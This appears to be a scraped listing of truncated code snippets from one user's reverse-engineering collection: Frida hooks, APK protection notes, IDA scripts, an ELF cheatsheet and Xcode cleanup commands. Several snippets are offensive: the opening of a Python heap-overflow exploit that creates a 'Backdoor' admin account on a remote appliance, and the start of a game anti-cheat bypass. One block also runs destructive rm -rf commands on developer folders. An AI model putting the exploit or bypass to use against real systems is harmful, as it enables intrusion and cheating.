apkunpacker

killall Xcode
xcrun -k
xcodebuild -alltargets clean
rm -rf "$(getconf DARWIN_USER_CACHE_DIR)/org.llvm.clang/ModuleCache"
rm -rf "$(getconf DARWIN_USER_CACHE_DIR)/org.llvm.clang.$(whoami)/ModuleCache"
rm -rf /Applications/Xcode.app
rm -rf ~/Library/Caches/com.apple.dt.Xcode
rm -rf ~/Library/Developer
rm -rf ~/Library/MobileDevice
rm -rf ~/Library/Preferences/com.apple.dt.Xcode.plist

apkunpacker

Interceptor.attach(ObjC.classes.AppDelegate['- application:continueUserActivity:restorationHandler:'].implementation, {
  onEnter: function (args) {

    printHeader(args)

    this.application = ObjC.Object(args[2]);
    this.continueUserActivity = ObjC.Object(args[3]);
    this.restorationHandler = ObjC.Object(args[4]);

    console.log("application: " + this.application);

apkunpacker

Zimperium zShield RE Notes

Newer versions of the Rabbit R1's APK are protected by https://www.zimperium.com/zshield/ (I don't know this for certain, somebody told me it is but I haven't really seen any identifying marks in the code yet)

Interesting assets within the APK:

lib/arm64-v8a/liboptipkawfn.so    ~3MB packed/encrypted ELF
assets/optipkawfn/0.odex          only 41 bytes (EDIT: I think this is part of an asset obfuscation scheme, the real file contents are likely elsewhere - inside the .szip maybe?)
assets/optipkawfn.szip ~8MB - I predict containing encrypted+compressed bytecode

apkunpacker

Here, I'll show you how to compile Frida (≥ 16.2.2) for both rootfull and rootless jailbreaks.

Old Instructions

If you want to compile an old version of Frida (< 16.2.2) you can use my old guide.

Build Instructions

Requirements

apkunpacker

import "frida-il2cpp-bridge";

function main() {
    const AssemblyCSharp = Il2Cpp.domain.assembly("Assembly-CSharp").image;
    // Note that on versions older than 2.x.y this isn't needed
    // Since ACTk bundled directly into Assembly-CSharp
    const ACTk_Runtime = Il2Cpp.domain.assembly("ACTk.Runtime").image;

    // Target class
    const PlayerData = AssemblyCSharp.class("PlayerData");

apkunpacker

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

Compilation

apkunpacker

import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8  = lambda x: struct.pack(">b", x)

# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks # python closes out of scope sockets
    port = 3211  # this is hardcoded in the binary
    print(f"[*] Exploiting ASMP on {hostname} port {port}")

apkunpacker

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <spawn.h>
#include <sys/wait.h>
#include <string.h>

/* ASLR disabling magic constant from Apple LLDB source code
   https://opensource.apple.com/source/lldb/lldb-76/tools/darwin-debug/darwin-debug.cpp
*/

apkunpacker

"""
summary: drawing custom graphs
description:
  Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
  show how to write actions that can be performed on those.
keywords: graph, actions
"""

from __future__ import print_function
# -----------------------------------------------------------------------

apkunpacker

from idautils import Segments, Functions, XrefsTo, XrefTypeName
from idc import get_segm_name, get_segm_end

class Dictionary(dict):
    def add(self, key, value):
        self[key] = value

xref_dict = Dictionary()

for segea in Segments():